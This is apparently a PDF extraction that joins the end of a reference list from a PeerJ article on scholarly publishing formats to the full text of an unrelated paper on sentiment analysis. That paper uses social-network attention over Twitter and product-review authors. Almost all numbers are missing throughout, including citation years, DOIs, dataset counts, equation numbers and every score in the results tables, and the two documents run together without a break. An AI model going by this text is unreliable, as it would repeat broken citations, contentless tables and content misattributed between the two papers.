drawings for document types, devices and applications have been adopted from calibre (http://calibre-ebook.com/), openclipart (https://openclipart.org/) and the gnome theme faenza (https://code.google.com/archive/p/faenza-icon-theme/). references benkler y. . the wealth of networks: how social production transforms markets and freedom. new haven: yale university press. berners-lee t, hendler j. . publishing on the semantic web. nature : – doi . / . bourne p. . will a biological database be different from a biological journal? plos computational biology :e doi . /journal.pcbi. . brauer m, durusau p, edwards g, faure d, magliery t, vogelheim d. . open document format for office applications (opendocument) v . . oasis. available at https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=office. brown c. . the e-volution of preprints in the scholarly communication of physicists and astronomers. journal of the association for information science and technology : – doi . / - ( ) : <::aid-asi > . .co; -d. brown c. . the role of electronic preprints in chemical communication: analysis of citation, usage, and acceptance in the journal literature. journal of the association for information science and technology : – doi . /asi. . brown po, eisen mb, varmus he. . why plos became a publisher. plos biology ( ):e doi . /journal.pbio. . butler d. . los alamos loses physics archive as preprint pioneer heads east. nature : – doi . / . callaway e. . preprints come to life. nature news : doi . / a. corbí a, burgos d. . semi-automated correction tools for mathematics-based exercises in mooc environments. international journal of interactive multimedia and artificial intelligence : – doi . /ijimai. . . dominici m. . an overview of pandoc. tugboat : – . eikebrokk t, dahl ta, kessel s. . epub as publication format in open access journals: tools and workflow. code lib epub ahead of print april . eisen m. . publish and be praised. the guardian. available at https://www. theguardian.com/education/ /oct/ /research.highereducation (accessed on october ). krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pandoc-scholar/pandoc-scholar https://doi.org/ . /zenodo. https://github.com/robert-winkler/scientific-articles-markdown/ https://github.com/robert-winkler/scientific-articles-markdown/ http://calibre-ebook.com/ https://openclipart.org/ https://code.google.com/archive/p/faenza-icon-theme/ http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pcbi. https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=office http://dx.doi.org/ . / - ( ) : \lt ::aid-asi \gt . .co; -d http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . / http://dx.doi.org/ . / a http://dx.doi.org/ . /ijimai. . https://www.theguardian.com/education/ /oct/ /research.highereducation https://www.theguardian.com/education/ /oct/ /research.highereducation http://dx.doi.org/ . /peerj-cs. fecher b, friesike s. . open science: one term, five schools of thought. in: bartling s, friesike s, eds. opening science. cham: springer international publishing, – . ginsparg p. . first steps towards electronic research communication. computers in physics : – doi . / . . haak ll, fenner m, paglione l, pentz e, ratner h. . orcid: a system to uniquely identify researchers. learned publishing : – doi . / . hickson i, berjon r, faulkner s, leithead t, navara ed, o’connor e, pfeiffer s, faulkner s, navara ed, leithead t, berjon r, hickson i, pfeiffer s, o’connor t. . html . w c. 
available at https://www.w .org/tr/ /rec-html - / . houghton j, rasmussen b, sheehan p, oppenheim c, morris a, creaser c, greenwood h, summers m, gourlay a. . economic implications of alternative scholarly publishing models: exploring the costs and benefits. available at https://www. webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/ documents/publications/rpteconomicoapublishing.pdf . international organization for standardizationd. . iso - : —document management—portable document format—part : pdf . iso. available at https: //www.iso.org/standard/ .html. international organization for standardization. . iso/iec : — information technology—universal coded character set (ucs). iso. available at https://www.iso.org/standard/ .html. kielhorn a. . multi-target publishing-generating epub, pdf, and more, from markdown using pandoc. tugboat-tex users group : – . kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kelley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c, jupyter development team. . jupyter notebooks–a publishing format for reproducible computational workflows. in: positioning and power in academic publishing: players, agents and agendas, – . lamport l. . latex: a document preparation system. reading: addison-wesley professional. lanthaler m, gütl c. . on using json-ld to create evolvable restful services. in: proceedings of the third international workshop on restful design. new york: acm, – doi . / . . leonard s. . guidance on markdown: design philosophies, stability strategies, and select registrations. internet request for comments. available at https://datatracker. ietf.org/doc/rfc / . national information standards organization. . ansi/niso z . - jats: journal article tag suite. available at http://www.niso.org/apps/group_public/ project/details.php?project_id= . ngo t. . office open xml overview ecma tc . ecma international. available at http://www.ecma-international.org/memento/tc -m.htm. ovadia s. . markdown for librarians and academics. behavioral & social sciences librarian : – doi . / . . . krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / https://www.w .org/tr/ /rec-html - / https://www.w .org/tr/ /rec-html - / https://www.webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html http://dx.doi.org/ . / . https://datatracker.ietf.org/doc/rfc / https://datatracker.ietf.org/doc/rfc / http://www.niso.org/apps/group_public/project/details.php?project_id= http://www.niso.org/apps/group_public/project/details.php?project_id= http://www.ecma-international.org/memento/tc -m.htm http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/ . raggett d, le hors a, jacobs i. . html . specification. w c. available at https://www.w .org/tr/html / . shotton d. . cito, the citation typing ontology. journal of biomedical semantics : – doi . / - - -s -s . simonsen k. . 
character mnemonics & character sets. rationel almen planlaegning; internet request for comments. available at https://datatracker.ietf.org/doc/rfc / . smith am, katz ds, niemeyer ke. . software citation principles. peerj computer science :e doi . /peerj-cs. . solomon d, björk b-c. . article processing charges for open access publication— the situation for research intensive universities in the usa and canada. peerj :e doi . /peerj. . suber p. . open access. cambridge: the mit press. towbin h, staehelin t, gordon j. . electrophoretic transfer of proteins from polyacrylamide gels to nitrocellulose sheets: procedure and some applications. proceedings of the national academy of sciences of the united states of america : – . van noorden r. . journal offers flat fee for ‘‘all you can publish’’. nature news : doi . / a. van noorden r. . open access: the true cost of science publishing. nature : – doi . / a. van noorden r. . the arxiv preprint server hits million articles. nature news doi . /nature. . (accessed on december ). volmer da, stokes cs. . how to prepare a manuscript fit-for-purpose for submis- sion and avoid getting a ‘‘desk-reject’’. rapid communications in mass spectrometry ( ): – doi . /rcm. . willinsky j. . the unacknowledged convergence of open source, open access, and open science. first monday epub ahead of print aug doi . /fm.v i . . woelfle m, olliaro p, todd mh. . open science is a research accelerator. nature chemistry : – doi . /nchem. . yergeau f. . utf- , a transformation format of iso . alis technologies. available at https://www.ipa.go.jp/security/rfc/rfc en.html. youngen gk. . citation patterns to traditional and electronic preprints in the pub- lished literature. college & research libraries : – doi . /crl. . . . further reading dpt collective. . monk j, rasch m, cramer f, wu a, eds. from print to ebooks: a hybrid publishing toolkit for the arts. amsterdam: institute of network cultures. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.r-project.org/ https://www.w .org/tr/html / http://dx.doi.org/ . / - - -s -s https://datatracker.ietf.org/doc/rfc / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / a http://dx.doi.org/ . / a http://dx.doi.org/ . /nature. . http://dx.doi.org/ . /rcm. http://dx.doi.org/ . /fm.v i . http://dx.doi.org/ . /nchem. https://www.ipa.go.jp/security/rfc/rfc en.html http://dx.doi.org/ . /crl. . . http://dx.doi.org/ . /peerj-cs. overcoming language variation in sentiment analysis with social attention yi yang and jacob eisenstein school of interactive computing georgia institute of technology atlanta, ga {yiyang+jacobe}@gatech.edu abstract variation in language is ubiquitous, particu- larly in newer forms of writing such as social media. fortunately, variation is not random; it is often linked to social properties of the au- thor. in this paper, we show how to exploit social networks to make sentiment analysis more robust to social language variation. the key idea is linguistic homophily: the tendency of socially linked individuals to use language in similar ways. we formalize this idea in a novel attention-based neural network architec- ture, in which attention is divided among sev- eral basis models, depending on the author’s position in the social network. 
this has the effect of smoothing the classification function across the social network, and makes it pos- sible to induce personalized classifiers even for authors for whom there is no labeled data or demographic metadata. this model signif- icantly improves the accuracies of sentiment analysis on twitter and on review data. introduction words can mean different things to different people. fortunately, these differences are rarely idiosyn- cratic, but are often linked to social factors, such as age (rosenthal and mckeown, ), gender (eck- ert and mcconnell-ginet, ), race (green, ), geography (trudgill, ), and more inef- fable characteristics such as political and cultural attitudes (fischer, ; labov, ). in natural language processing (nlp), social media data has brought variation to the fore, spurring the develop- ment of new computational techniques for charac- terizing variation in the lexicon (eisenstein et al., ), orthography (eisenstein, ), and syn- tax (blodgett et al., ). however, aside from the focused task of spelling normalization (sproat et al., ; aw et al., ), there have been few attempts to make nlp systems more robust to language vari- ation across speakers or writers. one exception is the work of hovy ( ), who shows that the accuracies of sentiment analysis and topic classification can be improved by the inclusion of coarse-grained author demographics such as age and gender. however, such demographic informa- tion is not directly available in most datasets, and it is not yet clear whether predicted age and gen- der offer any improvements. on the other end of the spectrum are attempts to create personalized lan- guage technologies, as are often employed in infor- mation retrieval (shen et al., ), recommender systems (basilico and hofmann, ), and lan- guage modeling (federico, ). but personal- ization requires annotated data for each individual user—something that may be possible in interactive settings such as information retrieval, but is not typ- ically feasible in natural language processing. we propose a middle ground between group-level demographic characteristics and personalization, by exploiting social network structure. the sociologi- cal theory of homophily asserts that individuals are usually similar to their friends (mcpherson et al., ). this property has been demonstrated for lan- guage (bryden et al., ) as well as for the demo- graphic properties targeted by hovy ( ), which are more likely to be shared by friends than by ran- dom pairs of individuals (thelwall, ). social transactions of the association for computational linguistics, vol. , pp. – , . action editor: christopher potts. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. figure : words such as ‘sick’ can express opposite sen- timent polarities depending on the author. we account for this variation by generalizing across the social network. network information is available in a wide range of contexts, from social media (huberman et al., ) to political speech (thomas et al., ) to histori- cal texts (winterer, ). thus, social network ho- mophily has the potential to provide a more general way to account for linguistic variation in nlp. figure gives a schematic of the motivation for our approach. 
The word 'sick' typically has a negative sentiment, e.g., 'I would like to believe he's sick rather than just mean and evil.' [Footnote: Charles Rangel, describing Dick Cheney.] However, in some communities the word can have a positive sentiment, e.g., the lyric 'this sick beat', recently trademarked by the musician Taylor Swift. Given labeled examples of 'sick' in use by individuals in a social network, we assume that the word will have a similar sentiment meaning for their near neighbors, an assumption of linguistic homophily that is the basis for this research. [Footnote: In the case of 'sick', speakers like Taylor Swift may employ either the positive or the negative meaning, while speakers like Charles Rangel employ only the negative meaning. In other cases, communities may maintain completely distinct semantics for a word, such as the term 'pants' in American and British English. Thanks to Christopher Potts for suggesting this distinction and this example.] Note that this differs from the assumption of label homophily, which entails that neighbors in the network will hold similar opinions, and will therefore produce similar document-level labels (Tan et al.; Hu et al.). Linguistic homophily is a more generalizable claim, which could in principle be applied to any language processing task where author network information is available.

To scale this basic intuition to datasets with tens of thousands of unique authors, we compress the social network into vector representations of each author node, using an embedding method for large-scale networks (Tang et al., b). Applying the algorithm to the schematic in the figure above, the authors within each triad would likely be closer to each other than to authors in the opposite triad. We then incorporate these embeddings into an attention-based neural network model, called Social Attention, which employs multiple basis models to focus on different regions of the social network.

We apply Social Attention to Twitter sentiment classification, gathering social network metadata for Twitter users in the SemEval Twitter sentiment analysis tasks (Nakov et al.). We further adapt the system to Ciao product reviews (Tang et al.), training author embeddings using trust relationships between reviewers. Social Attention offers an improvement of a few percent over related neural and ensemble architectures in which the social information is ablated. It also outperforms all prior published results on the SemEval Twitter test sets.

Data

In the SemEval Twitter sentiment analysis tasks, the goal is to classify the sentiment of each message as positive, negative, or neutral. Following Rosenthal et al., we train and tune our systems on the SemEval Twitter training and development datasets, respectively, and evaluate on the SemEval Twitter test sets. Statistics of these datasets are presented in the table below.

Table: Statistics of the SemEval Twitter sentiment datasets (# positive, # negative, and # neutral tweets for the Train, Dev, and Test sets).

Our training and development datasets lack some of the original Twitter messages, which may have been deleted since the datasets were constructed. However, our test datasets contain all the tweets used in the SemEval evaluations, making our results comparable with prior work. We construct three author social networks based on the follow, mention, and retweet relations between the authors in the training dataset, which we refer to as Follower, Mention, and Retweet.
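The crawling details are given next; for concreteness, the following minimal sketch (an illustration, not the authors' code) shows the undirected-graph representation assumed throughout, using networkx and made-up edge lists.

```python
# Illustrative sketch (not the authors' code): the follower, mention, and
# retweet relations are each stored as an undirected graph over author IDs.
import networkx as nx

def build_network(edges):
    """Any observed relation between two authors becomes an undirected tie."""
    g = nx.Graph()
    g.add_edges_from(edges)
    return g

# Hypothetical edge lists; in the study these come from the Twitter crawl
# described below (friend lists, and mentions/retweets in tweet metadata).
follower = build_network([("u1", "u2"), ("u2", "u3")])
mention  = build_network([("u1", "u3")])
retweet  = build_network([("u2", "u3"), ("u3", "u4")])

print(retweet.number_of_nodes(), retweet.number_of_edges())
```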
Specifically, we use the Twitter API to crawl the friends of the SemEval users (individuals that they follow) and the most recent tweets in their timelines. [Footnote: We could not gather the authorship information for a small fraction of the tweets in the training data, because the tweets or user accounts had been deleted by the time we crawled the social information. The Twitter API returns only a bounded number of the most recent tweets per timeline.] The mention and retweet links are then extracted from the tweet text and metadata. We treat all social networks as undirected graphs, where two users are socially connected if there exists at least one social relation between them.

Linguistic homophily

The hypothesis of linguistic homophily is that socially connected individuals tend to use language similarly, as compared to a randomly selected pair of individuals who are not socially connected. We now describe a pilot study that provides support for this hypothesis, focusing on the domain of sentiment analysis. The purpose of this study is to test whether errors in sentiment analysis are assortative on the social networks defined in the previous section: that is, if two individuals (i, j) are connected in the network, then a classifier error on i suggests that errors on j are more likely.

We test this idea using a simple lexicon-based classification approach, which we apply to the SemEval training data, focusing only on messages that are labeled as positive or negative (ignoring the neutral class), and excluding authors who contributed more than one message (a tiny minority). Using the social media sentiment lexicons defined by Tang et al., we label a message as positive if it has at least as many positive words as negative words, and as negative otherwise. [Footnote: The lexicons include words assigned at least a minimum confidence by the method of Tang et al.; ties go to the positive class because it is more common.] The assortativity is the fraction of dyads for which the classifier makes two correct predictions or two incorrect predictions (Newman). This measures whether classification errors are clustered on the network.

We compare the observed assortativity against the assortativity in a network that has been randomly rewired. [Footnote: Specifically, we use the double_edge_swap operation of the networkx package (Hagberg et al.). This operation preserves the degree of each node in the network.] Each rewiring epoch involves a number of random rewiring operations equal to the total number of edges in the network. (The edges are randomly selected, so a given edge may not be rewired in each epoch.) By counting the number of edges that occur in both the original and rewired networks, we observe that this process converges to a steady state after three or four epochs. As shown in the figure below, the original observed network displays more assortativity than the randomly rewired networks in nearly every case. Thus, the Twitter social networks display more linguistic homophily than we would expect due to chance alone.

Figure: Assortativity of observed and randomized networks. Each rewiring epoch performs a number of rewiring operations equal to the total number of edges in the network. The randomly rewired networks almost always display lower assortativities than the original network, indicating that the accuracy of the lexicon-based sentiment analyzer is more assortative on the observed social network than one would expect by chance.

The differences in assortativity across network types are small, indicating that none of the networks is clearly best. The retweet network was the most difficult to rewire, with the greatest proportion of shared edges between the original and rewired networks. This may explain why the assortativities of the randomly rewired networks were closest to the observed network in this case.

Model

In this section, we describe a neural network method that leverages social network information to improve text classification.
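As a brief aside before the model details, the rewiring test from the previous section can be sketched in a few lines. This is a hypothetical re-implementation using networkx, not the authors' released code; the graph g and a dict correct, mapping each author to whether the lexicon classifier got their message right, are assumed inputs.

```python
# Hypothetical re-implementation of the pilot study, not the authors' code.
import networkx as nx

def error_assortativity(g, correct):
    """Fraction of connected dyads where both endpoints are right or both wrong."""
    dyads = [(u, v) for u, v in g.edges() if u in correct and v in correct]
    agree = sum(correct[u] == correct[v] for u, v in dyads)
    return agree / len(dyads)

def rewired_baseline(g, correct, epochs=4):
    """Degree-preserving rewiring: one epoch attempts as many swaps as edges."""
    h = g.copy()
    for _ in range(epochs):
        nx.double_edge_swap(h, nswap=h.number_of_edges(),
                            max_tries=20 * h.number_of_edges())
    return error_assortativity(h, correct)

# observed = error_assortativity(g, correct)
# baseline = rewired_baseline(g, correct)
# Linguistic homophily predicts observed > baseline, as in the figure above.
```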
Our approach is inspired by ensemble learning, where the system prediction is the weighted combination of the outputs of several basis models. We encourage each basis model to focus on a local region of the social network, so that classification on socially connected individuals employs similar model combinations.

Given a set of instances $\{x_i\}$ and authors $\{a_i\}$, the goal of personalized probabilistic classification is to estimate a conditional label distribution $p(y \mid x, a)$. For most authors, no labeled data is available, so it is impossible to estimate this distribution directly. We therefore make a smoothness assumption over a social network $G$: individuals who are socially proximate in $G$ should have similar classifiers. This idea is put into practice by modeling the conditional label distribution as a mixture over the predictions of $K$ basis classifiers,

$p(y \mid x, a) = \sum_{k=1}^{K} \Pr(z_a = k \mid a, G)\, p(y \mid x, z_a = k).$

The basis classifiers $p(y \mid x, z_a = k)$ can be arbitrary conditional distributions; we use convolutional neural networks, as described below. The component weighting distribution $\Pr(z_a = k \mid a, G)$ is conditioned on the social network $G$, and functions as an attentional mechanism, also described below. The basic intuition is that for a pair of authors $a_i$ and $a_j$ who are nearby in the social network $G$, the prediction rules should behave similarly if the attentional distributions are similar, $p(z \mid a_i, G) \approx p(z \mid a_j, G)$. If we have labeled data only for $a_i$, some of the personalization from that data will be shared by $a_j$. The overall classification approach can be viewed as a mixture of experts (Jacobs et al.), leveraging the social network as side information to choose the distribution over experts for each author.

Social attention model

The goal of the social attention model is to assign similar basis weights to authors who are nearby in the social network $G$. We operationalize social proximity by embedding each node's social network position into a vector representation. Specifically, we employ the LINE method (Tang et al., b), which estimates $d^{(v)}$-dimensional node embeddings $v_a$ as parameters in a probabilistic model over edges in the social network. These embeddings are learned solely from the social network $G$, without leveraging any textual information. The attentional weights are then computed from the embeddings using a softmax layer,

$\Pr(z_a = k \mid a, G) = \frac{\exp\left(\phi_k^{\top} v_a + b_k\right)}{\sum_{k'=1}^{K} \exp\left(\phi_{k'}^{\top} v_a + b_{k'}\right)}.$

This embedding method uses only single-relational networks; in the evaluation, we will show results for Twitter networks built from follow, mention, and retweet relations. In future work, we may consider combining all of these relation types into a unified multi-relational network. It is possible that embeddings in such a network could be estimated using techniques borrowed from multi-relational knowledge networks (Bordes et al.; Wang et al.).
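To make the attentional mixture concrete, the following sketch (an illustration written for this article, not the authors' released code) turns frozen author embeddings into mixture weights over K basis classifiers. The basis models are left abstract here; a CNN basis model is sketched further below. PyTorch is assumed, and all names and shapes are illustrative.

```python
import torch
import torch.nn as nn

class SocialAttention(nn.Module):
    """Mixture of K basis classifiers, weighted by the author's network position.

    author_emb:   (num_authors, d_v) pretrained node embeddings (e.g. LINE),
                  kept frozen as in the text.
    basis_models: K modules, each mapping a document tensor to class logits.
    """
    def __init__(self, author_emb, basis_models):
        super().__init__()
        self.author_emb = nn.Embedding.from_pretrained(author_emb, freeze=True)
        self.basis_models = nn.ModuleList(basis_models)
        self.attn = nn.Linear(author_emb.size(1), len(basis_models))  # phi_k, b_k

    def forward(self, doc, author_ids):
        v_a = self.author_emb(author_ids)                  # (B, d_v)
        weights = torch.softmax(self.attn(v_a), dim=-1)    # (B, K): Pr(z_a = k | a, G)
        # per-basis class distributions, stacked to (B, K, T)
        probs = torch.stack(
            [torch.softmax(m(doc), dim=-1) for m in self.basis_models], dim=1)
        # p(y | x, a) = sum_k Pr(z_a = k | a, G) * p(y | x, z_a = k)
        return (weights.unsqueeze(-1) * probs).sum(dim=1)  # (B, T)
```

Training would minimize the negative log of the returned mixture probability for the gold class, which corresponds to the joint loss given below.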
Sentiment classification with convolutional neural networks

We next describe the basis models, $p(y \mid x, z = k)$. Because our target task is classification on microtext documents, we model this distribution using convolutional neural networks (CNNs; LeCun et al.), which have been proven to perform well on sentence classification tasks (Kalchbrenner et al.; Kim). CNNs apply layers of convolving filters to n-grams, thereby generating a vector of dense local features. CNNs improve upon traditional bag-of-words models because of their ability to capture word ordering information.

Let $x = [h_1, h_2, \cdots, h_n]$ be the input sentence, where $h_i$ is the $d^{(w)}$-dimensional word vector corresponding to the $i$-th word in the sentence. We use one convolutional layer and one max pooling layer to generate the sentence representation of $x$. The convolutional layer involves filters that are applied to bigrams to produce feature maps. Formally, given the bigram word vectors $h_i, h_{i+1}$, the features generated by $m$ filters can be computed by

$c_i = \tanh(W_L h_i + W_R h_{i+1} + b),$

where $c_i$ is an $m$-dimensional vector, $W_L$ and $W_R$ are $m \times d^{(w)}$ projection matrices, and $b$ is the bias vector. The $m$-dimensional vector representation of the sentence is given by the pooling operation

$s = \max_{i \in 1, \cdots, n-1} c_i.$

To obtain the conditional label probability, we utilize a multiclass logistic regression model,

$\Pr(y = t \mid x, z = k) = \frac{\exp(\beta_t^{\top} s_k + b_t)}{\sum_{t'=1}^{T} \exp(\beta_{t'}^{\top} s_k + b_{t'})},$

where $\beta_t$ is an $m$-dimensional weight vector, $b_t$ is the corresponding bias term, and $s_k$ is the $m$-dimensional sentence representation produced by the $k$-th basis model.

Training

We fix the pretrained author and word embeddings while training our social attention model. Let $\Theta$ denote the parameters that need to be learned, which include $\{W_L, W_R, b, \{\beta_t, b_t\}_{t=1}^{T}\}$ for every basis CNN model, and the attentional weights $\{\phi_k, b_k\}_{k=1}^{K}$. We minimize the following logistic loss objective for each training instance:

$\ell(\Theta) = -\sum_{t=1}^{T} \mathbb{1}[y^* = t] \log \Pr(y = t \mid x, a),$

where $y^*$ is the ground truth class for $x$, and $\mathbb{1}[\cdot]$ represents an indicator function. We train the models using the Adam optimizer (Kingma and Ba), with early stopping on the development set.

Initialization

One potential problem is that, after initialization, a small number of basis models may claim most of the mixture weights for all the users, while other basis models are inactive. This can occur because some basis models may be initialized with parameters that are globally superior. As a result, the "dead" basis models will receive near-zero gradient updates, and therefore can never improve. The true model capacity can thereby be substantially lower than the $K$ assigned experts.

Ideally, dead basis models will be avoided, because each basis model should focus on a unique region of the social network. To ensure that this happens, we pretrain the basis models using an instance weighting approach from the domain adaptation literature (Jiang and Zhai). For each basis model $k$, each author $a$ has an instance weight $\alpha_{a,k}$. These instance weights are based on the author's social network node embedding, so that socially proximate authors will have high weights for the same basis models. This is ensured by endowing each basis model with a random vector $\gamma_k \sim \mathcal{N}(0, \sigma^2 I)$, and setting the instance weights as

$\alpha_{a,k} = \mathrm{sigmoid}(\gamma_k^{\top} v_a).$

This simple design results in similar instance weights for socially proximate authors.
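Continuing the sketch started above, a single CNN basis model can be written as follows. Again this is illustrative PyTorch rather than the authors' code; the bigram filters, tanh nonlinearity, and max pooling mirror the equations in this section.

```python
import torch
import torch.nn as nn

class CNNBasisModel(nn.Module):
    """One basis classifier: bigram filters + tanh + max pooling + linear output."""
    def __init__(self, d_w, m, num_classes):
        super().__init__()
        self.w_left = nn.Linear(d_w, m, bias=False)   # W_L
        self.w_right = nn.Linear(d_w, m, bias=True)   # W_R, with the shared bias b
        self.out = nn.Linear(m, num_classes)          # beta_t and b_t

    def forward(self, h):
        # h: (B, n, d_w) pretrained word embeddings of an n-word message
        c = torch.tanh(self.w_left(h[:, :-1]) + self.w_right(h[:, 1:]))  # (B, n-1, m)
        s = c.max(dim=1).values                                          # pooled sentence vector
        return self.out(s)                                               # class logits
```

Each such module plays the role of one entry in basis_models in the earlier sketch; multiplying an author's per-instance loss by $\alpha_{a,k}$ then gives the instance-weighted pretraining objective described next.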
during pre- training, we train the k-th basis model by optimizing the following loss function for every instance: `k = −αa,k t∑ t= [y ∗ = t] log pr(y = t | x,za = k). ( ) the pretrained basis models are then assembled to- gether and jointly trained using equation . experiments our main evaluation focuses on the – semeval twitter sentiment analysis tasks. the datasets have been described in § . we train and tune our systems on the train and dev datasets respectively, and evaluate on the test – sets. in addition, we evaluate on another dataset based on ciao product reviews (tang et al., ). . social network expansion we utilize twitter’s follower, mention, and retweet social networks to train user embeddings. by query- ing the twitter api in april , we were able network # author # relation follower+ , , , mention+ , , , retweet+ , , , table : statistics of the author social networks used for training author embeddings. to identify , authors for the tweets in the se- meval datasets described above. we induce so- cial networks for these individuals by crawling their friend links and timelines, as described in § . un- fortunately, these networks are relatively sparse, with a large amount of isolated author nodes. to improve the quality of the author embeddings, we expand the set of author nodes by adding nodes that do the most to densify the author networks: for the follower network, we add additional individu- als that are followed by at least a hundred authors in the original set; for the mention and retweet net- works, we add all users that have been mentioned or retweeted by at least twenty authors in the origi- nal set. the statistics of the resulting networks are presented in table . . experimental settings we employ the pretrained word embeddings used by astudillo et al. ( ), which are trained with a cor- pus of million tweets, and have been shown to perform very well on this task. the embeddings are learned using the structured skip-gram model (ling et al., ), and the embedding dimension is set at , following astudillo et al. ( ). we re- port the same evaluation metric as the semeval chal- lenge: the average f score of positive and negative classes. competitive systems we consider five competi- tive twitter sentiment classification methods. con- volutional neural network (cnn) has been de- scribed in § . , and is the basis model of social attention. mixture of experts employs the same cnn model as an expert, but the mixture densi- regarding the neutral class: systems are penalized with false positives when neutral tweets are incorrectly classified as positive or negative, and with false negatives when positive or negative tweets are incorrectly classified as neutral. this fol- lows the evaluation procedure of the semeval challenge. ties solely depend on the input values. we adopt the summation of the pretrained word embeddings as the sentence-level input to learn the gating func- tion. the model architecture of random attention is nearly identical to social attention: the only distinction is that we replace the pretrained author embeddings with random embedding vectors, draw- ing uniformly from the interval (− . , . ). con- catenation concatenates the author embedding with the sentence representation obtained from cnn, and then feeds the new representation to a softmax clas- sifier. finally, we include social attention, the attention-based neural network method described in § . 
we also compare against the three top-performing systems in the semeval twitter sentiment analysis challenge (rosenthal et al., ): we- bis (hagen et al., ), unitn (severyn and mos- chitti, ), and lsislif (hamdan et al., ). unitn achieves the best average f score on test – sets among all the submitted systems. finally, we republish results of nlse (astudillo et al., ), a non-linear subspace embedding model. parameter tuning we tune all the hyperparam- eters on the semeval development set. we choose the number of bigram filters for the cnn models from { , , }. the size of author embeddings is selected from { , }. for mix- ture of experts, random attention and social at- tention, we compare a range of numbers of ba- sis models, { , , , }. we found that a rela- tively small number of basis models are usually suf- ficient to achieve good performance. the number of pretraining epochs is selected from { , , }. dur- ing joint training, we check the performance on the development set after each epoch to perform early stopping. . results table summarizes the main empirical findings, where we report results obtained from author em- beddings trained on retweet+ network for so- cial attention. the results of different social networks for social attention are shown in ta- ble . the best hyperparameters are: bigram the summation of the pretrained word embeddings works better than the average of the word embeddings. system test test test average our implementations cnn . . . . mixture of experts . . . * . random attention . . . * . concatenation . . . . social attention . * . * . * . reported results nlse . . . . webis . . . . unitn . . . . lsislif . . . . table : average f score on the semeval test sets. the best results are in bold. results are marked with * if they are significantly better than cnn at p < . . semeval test network average follower+ . . . . mention+ . . . . retweet+ . . . . table : comparison of different social networks with social attention. the best results are in bold. filters; -dimensional author embeddings; k = basis models; pre-training epoch. to establish the statistical significance of the results, we obtain bootstrap samples for each test set, and compute the f score on each sample for each algorithm. a two- tail paired t-test is then applied to determine if the f scores of two algorithms are significantly different, p < . . mixture of experts, random attention, and cnn all achieve similar average f scores on the semeval twitter – test sets. note that random at- tention can benefit from some of the personalized information encoded in the random author embed- dings, as twitter messages posted by the same au- thor share the same attentional weights. however, it barely improves the results, because the majority of authors contribute a single message in the semeval datasets. with the incorporation of author social net- work information, concatenation slightly improves the classification performance. finally, social at- tention gives much better results than concatena- tion, as it is able to model the interactions between text representations and author representations. it significantly outperforms cnn on all the semeval test sets, yielding . % improvement on average f score. social attention also performs substan- tially better than the top-performing semeval sys- tems and nlse, especially on the and test sets. we now turn to a comparison of the social net- works. 
as shown in table , the retweet+ net- work is the most effective, although the differences are small: social attention outperforms prior work regardless of which network is selected. twit- ter’s “following” relation is a relatively low-cost form of social engagement, and it is less public than retweeting or mentioning another user. thus it is unsurprising that the follower network is least useful for socially-informed personalization. the retweet+ network has denser social connections than mention+, which could lead to better author embeddings. . analysis we now investigate whether language variation in sentiment meaning has been captured by different basis models. we focus on the same sentiment words (tang et al., ) that we used to test lin- guistic homophily in our analysis. we are inter- ested to discover sentiment words that are used with the opposite sentiment meanings by some authors. to measure the level of model-specificity for each basis model more positive more negative banging loss fever broken fucking dear like god yeah wow chilling cold ill sick suck satisfy trust wealth strong lmao ass damn piss bitch shit talent honestly voting win clever insane bawling fever weird cry lmao super lol haha hahaha ruin silly bad boring dreadful lovatics wish beliebers arianators kendall table : top more positive/negative words for the basis models in the semeval training data. bolded entries correspond to words that are often used ironically, by top authors related to basis model and . underlined entries are swear words, which are sometimes used positively by top users corresponding to basis model . italic entries refer to celebrities and their fans, which usually appear in negative tweets by top authors for basis model . word sentiment example sick positive watch espn tonight to see me burning @user for a sick goal on the top ten. #realbackyardfifa bitch positive @user bitch u shoulda came with me saturday sooooo much fun. met romeo santos lmao na i met his look a like shit positive @user well shit! i hope your back for the morning show. i need you on my drive to cupertino on monday! have fun! dear negative dear spurs, you are out of coc, not in champions league and come may wont be in top . why do you even exist? wow negative wow. tiger fires a but not good enough. nick watney shoots a if he birdies the th?!? #sick lol negative lol super awkward if its hella foggy at rim tomorrow and the games suppose to be on tv lol uhhhh.. where’s the ball? lol table : tweet examples that contain sentiment words conveying specific sentiment meanings that differ from their common senses in the semeval training data. the sentiment labels are adopted from the semeval annotations. word w, we compute the difference between the model-specific probabilities p(y | x = w,z = k) and the average probabilities of all basis models k ∑k k= p(y | x = w,z = k) for positive and neg- ative classes. the five words in the negative and pos- itive lexicons with the highest scores for each model are presented in table . as shown in table , twitter users correspond- ing to basis models and often use some words ironically in their tweets. basis model tends to assign positive sentiment polarity to swear words, and twitter users related to basis model seem to be less fond of fans of certain celebrities. finally, basis model identifies twitter users that we have described in the introduction—they often adopt gen- eral negative words like ‘ill’, ‘sick’, and ‘suck’ posi- tively. 
